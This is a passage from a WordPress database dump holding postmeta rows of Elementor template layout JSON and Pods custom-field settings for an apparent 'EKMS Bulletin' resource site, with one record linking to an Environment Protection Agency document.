settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#979797\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"475d6d1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"209d32b\"}]},\"elements\":[{\"id\":\"f921e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c4bbd21\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cd308b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ec5bf6e\"}]},\"elements\":[{\"id\":\"b1ef2a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"44907c3\",\"elType\":\"widget\",\"settings\":{\"show_label\":\"\",\"prev_label\":\"Previous\",\"next_label\":\"Next\",\"text_color\":\"#0A3C11\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(28404,4093,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/related_topic\";s:10:\"preview_id\";s:3:\"473\";}'),(28405,4093,'_elementor_conditions','a:2:{i:0;s:30:\"include/singular/related_topic\";i:1;s:29:\"include/singular/mea_resource\";}'),(28407,4094,'_elementor_edit_mode','builder'),(28408,4094,'_elementor_template_type','single-post'),(28409,4094,'_elementor_version','3.4.0'),(28410,4094,'_elementor_pro_version','3.3.6'),(28411,4094,'_wp_page_template','default'),(28412,4094,'_elementor_data','[{\"id\":\"15019d2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"661b180\"}],\"layout\":\"full_width\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ac9681b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eb8dae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1be2146\"}]},\"elements\":[{\"id\":\"38b0e91\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3a01213\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"cbcaacd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"},\"align\":\"left\",\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"8f2b769\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"0fe64ca\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Modified:\",\"link\":\"\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-eye\",\"library\":\"fa-solid\"},\"_id\":\"72daeb5\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"custom\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"cd45f24\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#979797\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"475d6d1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"209d32b\"}]},\"elements\":[{\"id\":\"f921e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c4bbd21\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cd308b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ec5bf6e\"}]},\"elements\":[{\"id\":\"b1ef2a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"44907c3\",\"elType\":\"widget\",\"settings\":{\"show_label\":\"\",\"prev_label\":\"Previous\",\"next_label\":\"Next\",\"text_color\":\"#0A3C11\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(38599,91,'_elementor_css','a:6:{s:4:\"time\";i:1770859410;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:4:{i:0;s:7:\"c57d27d\";i:1;s:7:\"c57d27d\";i:2;s:7:\"c57d27d\";i:3;s:7:\"c57d27d\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(28414,4094,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/related_topic\";s:10:\"preview_id\";s:3:\"473\";}'),(28415,4094,'_elementor_conditions','a:2:{i:0;s:30:\"include/singular/related_topic\";i:1;s:29:\"include/singular/mea_resource\";}'),(28416,4088,'_elementor_controls_usage','a:7:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:25:\"theme-post-featured-image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"align\";i:1;s:5:\"image\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:3:{s:19:\"image_border_border\";i:1;s:18:\"image_border_width\";i:1;s:18:\"image_border_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:10:\"text_color\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:15:\"post-navigation\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:31:\"section_post_navigation_content\";a:1:{s:10:\"show_label\";i:1;}}s:5:\"style\";a:1:{s:11:\"title_style\";a:3:{s:10:\"text_color\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;}}}}}'),(28422,4096,'_elementor_edit_mode','builder'),(28423,4096,'_elementor_template_type','loop'),(28424,4096,'_elementor_version','3.4.0'),(28425,4096,'_elementor_pro_version','3.3.6'),(28426,4096,'_edit_lock','1629305301:43'),(28427,4096,'_edit_last','43'),(28428,4096,'_wp_page_template','default'),(28429,4097,'_elementor_edit_mode','builder'),(28430,4097,'_elementor_template_type','loop'),(28431,4097,'_elementor_version','3.4.0'),(28432,4097,'_elementor_pro_version','3.3.6'),(28433,4097,'_wp_page_template','default'),(28434,2483,'supports_jetpack_publicize','0'),(28435,2483,'supports_jetpack_markdown','0'),(28436,2483,'built_in_taxonomies_elementor_font_type','0'),(28437,2483,'built_in_taxonomies_wp_theme','0'),(28438,2483,'pfat_filter_archive_custom','the_content'),(28439,4098,'type','text'),(28440,4098,'required','0'),(28441,4098,'text_allow_shortcode','0'),(28442,4098,'text_allow_html','0'),(28443,4098,'text_allowed_html_tags','strong em a ul ol li b i'),(28444,4098,'text_max_length','255'),(28445,4098,'website_format','normal'),(28446,4098,'website_allow_port','0'),(28447,4098,'website_clickable','0'),(28448,4098,'website_new_window','0'),(28449,4098,'website_max_length','255'),(28450,4098,'website_html5','0'),(28451,4098,'phone_format','999-999-9999 x999'),(28452,4098,'phone_enable_phone_extension','1'),(28453,4098,'phone_max_length','25'),(28454,4098,'phone_html5','0'),(28455,4098,'email_max_length','255'),(28456,4098,'email_html5','0'),(28457,4098,'password_max_length','255'),(28458,4098,'paragraph_allow_html','1'),(28459,4098,'paragraph_oembed','0'),(28460,4098,'paragraph_wptexturize','1'),(28461,4098,'paragraph_convert_chars','1'),(28462,4098,'paragraph_wpautop','1'),(28463,4098,'paragraph_allow_shortcode','0'),(28464,4098,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(28465,4098,'paragraph_max_length','0'),(28466,4098,'wysiwyg_editor','tinymce'),(28467,4098,'wysiwyg_media_buttons','1'),(28468,4098,'wysiwyg_oembed','0'),(28469,4098,'wysiwyg_wptexturize','1'),(28470,4098,'wysiwyg_convert_chars','1'),(28471,4098,'wysiwyg_wpautop','1'),(28472,4098,'wysiwyg_allow_shortcode','0'),(28473,4098,'code_allow_shortcode','0'),(28474,4098,'code_max_length','0'),(28475,4098,'datetime_type','wp'),(28476,4098,'datetime_format','mdy'),(28477,4098,'datetime_time_type','wp'),(28478,4098,'datetime_time_format','h_mm_A'),(28479,4098,'datetime_time_format_24','hh_mm'),(28480,4098,'datetime_allow_empty','1'),(28481,4098,'datetime_html5','0'),(28482,4098,'date_type','wp'),(28483,4098,'date_format','mdy'),(28484,4098,'date_allow_empty','1'),(28485,4098,'date_html5','0'),(28486,4098,'time_type','wp'),(28487,4098,'time_format','h_mm_A'),(28488,4098,'time_format_24','hh_mm'),(28489,4098,'time_allow_empty','1'),(28490,4098,'time_html5','0'),(28491,4098,'number_format_type','number'),(28492,4098,'number_format','i18n'),(28493,4098,'number_decimals','0'),(28494,4098,'number_format_soft','0'),(28495,4098,'number_step','1'),(28496,4098,'number_min','0'),(28497,4098,'number_max','100'),(28498,4098,'number_max_length','12'),(28499,4098,'currency_format_type','number'),(28500,4098,'currency_format_sign','aud'),(28501,4098,'currency_format_placement','before'),(28502,4098,'currency_format','i18n'),(28503,4098,'currency_decimals','2'),(28504,4098,'currency_decimal_handling','none'),(28505,4098,'currency_step','1'),(28506,4098,'currency_min','0'),(28507,4098,'currency_max','1000'),(28508,4098,'currency_max_length','12'),(28509,4098,'file_format_type','single'),(28510,4098,'file_uploader','attachment'),(28511,4098,'file_attachment_tab','upload'),(28512,4098,'file_upload_dir','wp'),(28513,4098,'file_edit_title','1'),(28514,4098,'file_show_edit_link','0'),(28515,4098,'file_linked','0'),(28516,4098,'file_limit','0'),(28517,4098,'file_restrict_filesize','10MB'),(28518,4098,'file_type','images'),(28519,4098,'file_field_template','rows'),(28520,4098,'file_add_button','Add File'),(28521,4098,'file_modal_title','Attach a file'),(28522,4098,'file_modal_add_button','Add File'),(28523,4098,'file_wp_gallery_output','0'),(28524,4098,'file_wp_gallery_link','post'),(28525,4098,'file_wp_gallery_columns','1'),(28526,4098,'file_wp_gallery_random_sort','0'),(28527,4098,'file_wp_gallery_size','thumbnail'),(28528,4098,'oembed_width','0'),(28529,4098,'oembed_height','0'),(28530,4098,'oembed_show_preview','0'),(28531,4098,'oembed_restrict_providers','0'),(28532,4098,'oembed_enabled_providers_amazoncn','0'),(28533,4098,'oembed_enabled_providers_amazoncouk','0'),(28534,4098,'oembed_enabled_providers_amazoncom','0'),(28535,4098,'oembed_enabled_providers_amazoncomau','0'),(28536,4098,'oembed_enabled_providers_amazonin','0'),(28537,4098,'oembed_enabled_providers_animotocom','0'),(28538,4098,'oembed_enabled_providers_cloudupcom','0'),(28539,4098,'oembed_enabled_providers_crowdsignalcom','0'),(28540,4098,'oembed_enabled_providers_dailymotioncom','0'),(28541,4098,'oembed_enabled_providers_facebookcom','0'),(28542,4098,'oembed_enabled_providers_flickrcom','0'),(28543,4098,'oembed_enabled_providers_gfycatcom','0'),(28544,4098,'oembed_enabled_providers_icloudcom','0'),(28545,4098,'oembed_enabled_providers_imgurcom','0'),(28546,4098,'oembed_enabled_providers_issuucom','0'),(28547,4098,'oembed_enabled_providers_kickstartercom','0'),(28548,4098,'oembed_enabled_providers_loomcom','0'),(28549,4098,'oembed_enabled_providers_mesh','0'),(28550,4098,'oembed_enabled_providers_meetupcom','0'),(28551,4098,'oembed_enabled_providers_mixcloudcom','0'),(28552,4098,'oembed_enabled_providers_odeslico','0'),(28553,4098,'oembed_enabled_providers_redditcom','0'),(28554,4098,'oembed_enabled_providers_reverbnationcom','0'),(28555,4098,'oembed_enabled_providers_screencastcom','0'),(28556,4098,'oembed_enabled_providers_scribdcom','0'),(28557,4098,'oembed_enabled_providers_sketchfabcom','0'),(28558,4098,'oembed_enabled_providers_slidesharenet','0'),(28559,4098,'oembed_enabled_providers_smugmugcom','0'),(28560,4098,'oembed_enabled_providers_someecardscom','0'),(28561,4098,'oembed_enabled_providers_soundcloudcom','0'),(28562,4098,'oembed_enabled_providers_speakerdeckcom','0'),(28563,4098,'oembed_enabled_providers_spotifycom','0'),(28564,4098,'oembed_enabled_providers_tedcom','0'),(28565,4098,'oembed_enabled_providers_tiktokcom','0'),(28566,4098,'oembed_enabled_providers_tumblrcom','0'),(28567,4098,'oembed_enabled_providers_twittercom','0'),(28568,4098,'oembed_enabled_providers_vimeocom','0'),(28569,4098,'oembed_enabled_providers_wistiacom','0'),(28570,4098,'oembed_enabled_providers_wordpresscom','0'),(28571,4098,'oembed_enabled_providers_wordpresstv','0'),(28572,4098,'oembed_enabled_providers_youtubecom','0'),(28573,4098,'pick_format_type','single'),(28574,4098,'pick_format_single','dropdown'),(28575,4098,'pick_format_multi','checkbox'),(28576,4098,'pick_display_format_multi','default'),(28577,4098,'pick_display_format_separator',', '),(28578,4098,'pick_allow_add_new','1'),(28579,4098,'pick_taggable','0'),(28580,4098,'pick_show_icon','1'),(28581,4098,'pick_show_edit_link','1'),(28582,4098,'pick_show_view_link','1'),(28583,4098,'pick_limit','0'),(28584,4098,'pick_user_role','a:0:{}'),(28585,4098,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(28586,4098,'boolean_format_type','checkbox'),(28587,4098,'boolean_yes_label','Yes'),(28588,4098,'boolean_no_label','No'),(28589,4098,'admin_only','0'),(28590,4098,'restrict_role','0'),(28591,4098,'restrict_capability','0'),(28592,4098,'hidden','0'),(28593,4098,'read_only','0'),(28594,4098,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(28595,4098,'rest_read','0'),(28596,4098,'rest_write','0'),(28597,4098,'rest_pick_response','array'),(28598,4098,'rest_pick_depth','1'),(28599,4099,'type','date'),(28600,4099,'required','0'),(28601,4099,'text_allow_shortcode','0'),(28602,4099,'text_allow_html','0'),(28603,4099,'text_allowed_html_tags','strong em a ul ol li b i'),(28604,4099,'text_max_length','255'),(28605,4099,'website_format','normal'),(28606,4099,'website_allow_port','0'),(28607,4099,'website_clickable','0'),(28608,4099,'website_new_window','0'),(28609,4099,'website_max_length','255'),(28610,4099,'website_html5','0'),(28611,4099,'phone_format','999-999-9999 x999'),(28612,4099,'phone_enable_phone_extension','1'),(28613,4099,'phone_max_length','25'),(28614,4099,'phone_html5','0'),(28615,4099,'email_max_length','255'),(28616,4099,'email_html5','0'),(28617,4099,'password_max_length','255'),(28618,4099,'paragraph_allow_html','1'),(28619,4099,'paragraph_oembed','0'),(28620,4099,'paragraph_wptexturize','1'),(28621,4099,'paragraph_convert_chars','1'),(28622,4099,'paragraph_wpautop','1'),(28623,4099,'paragraph_allow_shortcode','0'),(28624,4099,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(28625,4099,'paragraph_max_length','0'),(28626,4099,'wysiwyg_editor','tinymce'),(28627,4099,'wysiwyg_media_buttons','1'),(28628,4099,'wysiwyg_oembed','0'),(28629,4099,'wysiwyg_wptexturize','1'),(28630,4099,'wysiwyg_convert_chars','1'),(28631,4099,'wysiwyg_wpautop','1'),(28632,4099,'wysiwyg_allow_shortcode','0'),(28633,4099,'code_allow_shortcode','0'),(28634,4099,'code_max_length','0'),(28635,4099,'datetime_type','wp'),(28636,4099,'datetime_format','mdy'),(28637,4099,'datetime_time_type','wp'),(28638,4099,'datetime_time_format','h_mm_A'),(28639,4099,'datetime_time_format_24','hh_mm'),(28640,4099,'datetime_allow_empty','1'),(28641,4099,'datetime_html5','0'),(28642,4099,'date_type','wp'),(28643,4099,'date_format','mdy'),(28644,4099,'date_allow_empty','0'),(28645,4099,'date_html5','0'),(28646,4099,'time_type','wp'),(28647,4099,'time_format','h_mm_A'),(28648,4099,'time_format_24','hh_mm'),(28649,4099,'time_allow_empty','1'),(28650,4099,'time_html5','0'),(28651,4099,'number_format_type','number'),(28652,4099,'number_format','i18n'),(28653,4099,'number_decimals','0'),(28654,4099,'number_format_soft','0'),(28655,4099,'number_step','1'),(28656,4099,'number_min','0'),(28657,4099,'number_max','100'),(28658,4099,'number_max_length','12'),(28659,4099,'currency_format_type','number'),(28660,4099,'currency_format_sign','aud'),(28661,4099,'currency_format_placement','before'),(28662,4099,'currency_format','i18n'),(28663,4099,'currency_decimals','2'),(28664,4099,'currency_decimal_handling','none'),(28665,4099,'currency_step','1'),(28666,4099,'currency_min','0'),(28667,4099,'currency_max','1000'),(28668,4099,'currency_max_length','12'),(28669,4099,'file_format_type','single'),(28670,4099,'file_uploader','attachment'),(28671,4099,'file_attachment_tab','upload'),(28672,4099,'file_upload_dir','wp'),(28673,4099,'file_edit_title','1'),(28674,4099,'file_show_edit_link','0'),(28675,4099,'file_linked','0'),(28676,4099,'file_limit','0'),(28677,4099,'file_restrict_filesize','10MB'),(28678,4099,'file_type','images'),(28679,4099,'file_field_template','rows'),(28680,4099,'file_add_button','Add File'),(28681,4099,'file_modal_title','Attach a file'),(28682,4099,'file_modal_add_button','Add File'),(28683,4099,'file_wp_gallery_output','0'),(28684,4099,'file_wp_gallery_link','post'),(28685,4099,'file_wp_gallery_columns','1'),(28686,4099,'file_wp_gallery_random_sort','0'),(28687,4099,'file_wp_gallery_size','thumbnail'),(28688,4099,'oembed_width','0'),(28689,4099,'oembed_height','0'),(28690,4099,'oembed_show_preview','0'),(28691,4099,'oembed_restrict_providers','0'),(28692,4099,'oembed_enabled_providers_amazoncn','0'),(28693,4099,'oembed_enabled_providers_amazoncouk','0'),(28694,4099,'oembed_enabled_providers_amazoncom','0'),(28695,4099,'oembed_enabled_providers_amazoncomau','0'),(28696,4099,'oembed_enabled_providers_amazonin','0'),(28697,4099,'oembed_enabled_providers_animotocom','0'),(28698,4099,'oembed_enabled_providers_cloudupcom','0'),(28699,4099,'oembed_enabled_providers_crowdsignalcom','0'),(28700,4099,'oembed_enabled_providers_dailymotioncom','0'),(28701,4099,'oembed_enabled_providers_facebookcom','0'),(28702,4099,'oembed_enabled_providers_flickrcom','0'),(28703,4099,'oembed_enabled_providers_gfycatcom','0'),(28704,4099,'oembed_enabled_providers_icloudcom','0'),(28705,4099,'oembed_enabled_providers_imgurcom','0'),(28706,4099,'oembed_enabled_providers_issuucom','0'),(28707,4099,'oembed_enabled_providers_kickstartercom','0'),(28708,4099,'oembed_enabled_providers_loomcom','0'),(28709,4099,'oembed_enabled_providers_mesh','0'),(28710,4099,'oembed_enabled_providers_meetupcom','0'),(28711,4099,'oembed_enabled_providers_mixcloudcom','0'),(28712,4099,'oembed_enabled_providers_odeslico','0'),(28713,4099,'oembed_enabled_providers_redditcom','0'),(28714,4099,'oembed_enabled_providers_reverbnationcom','0'),(28715,4099,'oembed_enabled_providers_screencastcom','0'),(28716,4099,'oembed_enabled_providers_scribdcom','0'),(28717,4099,'oembed_enabled_providers_sketchfabcom','0'),(28718,4099,'oembed_enabled_providers_slidesharenet','0'),(28719,4099,'oembed_enabled_providers_smugmugcom','0'),(28720,4099,'oembed_enabled_providers_someecardscom','0'),(28721,4099,'oembed_enabled_providers_soundcloudcom','0'),(28722,4099,'oembed_enabled_providers_speakerdeckcom','0'),(28723,4099,'oembed_enabled_providers_spotifycom','0'),(28724,4099,'oembed_enabled_providers_tedcom','0'),(28725,4099,'oembed_enabled_providers_tiktokcom','0'),(28726,4099,'oembed_enabled_providers_tumblrcom','0'),(28727,4099,'oembed_enabled_providers_twittercom','0'),(28728,4099,'oembed_enabled_providers_vimeocom','0'),(28729,4099,'oembed_enabled_providers_wistiacom','0'),(28730,4099,'oembed_enabled_providers_wordpresscom','0'),(28731,4099,'oembed_enabled_providers_wordpresstv','0'),(28732,4099,'oembed_enabled_providers_youtubecom','0'),(28733,4099,'pick_format_type','single'),(28734,4099,'pick_format_single','dropdown'),(28735,4099,'pick_format_multi','checkbox'),(28736,4099,'pick_display_format_multi','default'),(28737,4099,'pick_display_format_separator',', '),(28738,4099,'pick_allow_add_new','1'),(28739,4099,'pick_taggable','0'),(28740,4099,'pick_show_icon','1'),(28741,4099,'pick_show_edit_link','1'),(28742,4099,'pick_show_view_link','1'),(28743,4099,'pick_limit','0'),(28744,4099,'pick_user_role','a:0:{}'),(28745,4099,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(28746,4099,'boolean_format_type','checkbox'),(28747,4099,'boolean_yes_label','Yes'),(28748,4099,'boolean_no_label','No'),(28749,4099,'admin_only','0'),(28750,4099,'restrict_role','0'),(28751,4099,'restrict_capability','0'),(28752,4099,'hidden','0'),(28753,4099,'read_only','0'),(28754,4099,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(28755,4099,'rest_read','0'),(28756,4099,'rest_write','0'),(28757,4099,'rest_pick_response','array'),(28758,4099,'rest_pick_depth','1'),(28920,4098,'unique','0'),(28921,4098,'text_repeatable','0'),(28922,4099,'unique','0'),(28923,4099,'date_repeatable','0'),(29089,3791,'_wp_page_template','default'),(29090,3791,'owner','Environment Protection Agency'),(29091,3791,'closed_date','2021-08-18'),(29092,3791,'link_to_website','https://www.epa.gov.lr/sites/default/files/CCCD%20INDIVIDUAL%20ASSESSMENT.pdf'),(29093,4096,'_elementor_data','[{\"id\":\"e4a1abb\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"15b418c\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"0d08dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ee7a55e\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"dcb65e7\"}],\"structure\":\"30\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"6114d2a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":56.97699999999999675992512493394315242767333984375},\"elements\":[{\"id\":\"05e59ec\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"0dd0942\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"1bdd720\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.629000000000001335820343228988349437713623046875,\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"7b6adbb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\"}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"7beb698\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.998000000000001108446667785756289958953857421875},\"elements\":[{\"id\":\"9df80b7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"69112db\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%7D\\\"]\"}}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29095,4105,'_elementor_edit_mode','builder'),(29096,4105,'_elementor_template_type','wp-page'),(29097,4105,'_elementor_version','2.7.5'),(29098,4105,'_wp_page_template','default'),(29099,4105,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin 